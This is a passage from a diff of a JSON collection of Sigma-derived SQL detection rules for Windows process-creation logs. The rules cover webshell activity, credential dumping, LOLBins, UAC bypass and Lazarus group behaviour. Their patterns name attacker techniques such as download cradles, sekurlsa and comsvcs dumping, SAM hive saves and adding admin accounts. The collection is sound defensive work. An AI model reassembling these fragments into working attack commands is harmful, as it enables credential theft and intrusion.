'%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tracert.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager \"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine LIKE '%ADManager Plus%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE '%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_spawn.yml" + "filename": "proc_creation_win_susp_download_office_domain.yml" }, { - "title": "Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32", - "id": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0", - "status": "test", - "description": "Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Execute MSDT Via Answer File", + "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", + "status": "experimental", + "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.010" + "attack.t1218", + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%,DllEntry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af %' ESCAPE '\\' OR CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_aptc12_bluemushroom.yml" + "filename": "proc_creation_win_lolbin_msdt_answer_file.yml" }, { - "title": "Webshell Hacking Activity Patterns", - "id": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", + "title": "PrintBrm ZIP Creation of Extraction", + "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", "status": "experimental", - "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.command_and_control", + "attack.t1105", + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adfind.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE '\\' OR CommandLine LIKE '%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_webshell_hacking.yml" + "filename": "proc_creation_win_lolbin_printbrm.yml" }, { - "title": "Disable Important Scheduled Task", - "id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", - "status": "experimental", - "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation VAR+ Launcher", + "id": "27aec9c9-dbb0-4939-8422-1742242471d0", + "status": "test", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.impact", - "attack.t1489" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_disable.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" }, { - "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", - "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", - "status": "experimental", - "description": "Detects usage of cmdkey to look for cached credentials on the system", - "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Pypykatz Credentials Dumping Activity", + "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", + "status": "test", + "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1003.005" + "attack.t1003.002" ], "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR CommandLine LIKE '% -l%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmdkey_recon.yml" + "filename": "proc_creation_win_hktl_pypykatz.yml" }, { - "title": "Potential Persistence Via Netsh Helper DLL", - "id": "56321594-9087-49d9-bf10-524fe8479452", - "status": "test", - "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", - "author": "Victor Sergeev, oscd.community", + "title": "Mavinject Inject DLL Into Running Process", + "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "status": "experimental", + "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.007", - "attack.s0108" + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND NOT (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" + "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" }, { - "title": "HackTool - TruffleSnout Execution", - "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", + "title": "Potential Renamed Rundll32 Execution", + "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", "status": "experimental", - "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", - "author": "frack113", + "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'TruffleSnout.exe' OR NewProcessName LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_trufflesnout.yml" + "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" }, { - "title": "Suspicious Shells Spawn by SQL Server", - "id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", + "title": "Suspicious Key Manager Access", + "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", "status": "experimental", - "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", - "author": "FPT.EagleEye Team, wagga", + "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1505.003", - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.credential_access", + "attack.t1555.004" + ], + "falsepositives": [ + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mssql_susp_child_process.yml" + "filename": "proc_creation_win_rundll32_keymgr.yml" }, { - "title": "Suspicious Schtasks Execution AppData Folder", - "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", - "status": "experimental", - "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", - "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", + "title": "Exploit for CVE-2015-1641", + "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "status": "stable", + "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_schtasks_appdata_local_system.yml" + "filename": "proc_creation_win_exploit_cve_2015_1641.yml" }, { - "title": "HackTool - SharpChisel Execution", - "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", - "status": "experimental", - "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "title": "New User Created Via Net.EXE With Never Expire Option", + "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", + "status": "test", + "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.001" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%expires:never%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharp_chisel.yml" + "filename": "proc_creation_win_net_user_add_never_expire.yml" }, { - "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", - "id": "28ac00d6-22d9-4a3c-927f-bbd770104573", - "status": "experimental", - "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", - "author": "frack113", + "title": "Lazarus Group Activity", + "id": "24c4d154-05a4-4b99-b57d-9b977472443a", + "status": "test", + "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.g0032", + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE '\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '% -p 0x%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32 %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE '\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" + "filename": "proc_creation_win_apt_lazarus_group_activity.yml" }, { - "title": "Renamed SysInternals DebugView Execution", - "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", + "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", + "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", "status": "test", - "description": "Detects suspicious renamed SysInternals DebugView execution", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects dump of credentials in VeeamBackup dbo", + "author": "frack113", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 'Dbgview.exe' AND NewProcessName LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" + "filename": "proc_creation_win_sqlcmd_veeam_dump.yml" }, { - "title": "PUA - Process Hacker / System Informer Execution", - "id": "811e0002-b13b-4a15-9d00-a613fce66e42", - "status": "experimental", - "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Sometimes used by developers or system administrators for debugging purposes" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product = 'Process Hacker' OR (Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE '%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN ('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" + "title": "UAC Bypass Using NTFS Reparse Point - Process", + "id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "status": "test", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], - "filename": "proc_creation_win_pua_process_hacker.yml" - }, - { - "title": "Rundll32 Execution Without DLL File", - "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", - "status": "experimental", - "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", - "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine = '') OR (CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND CommandLine LIKE '%Avira.OE.Setup%' 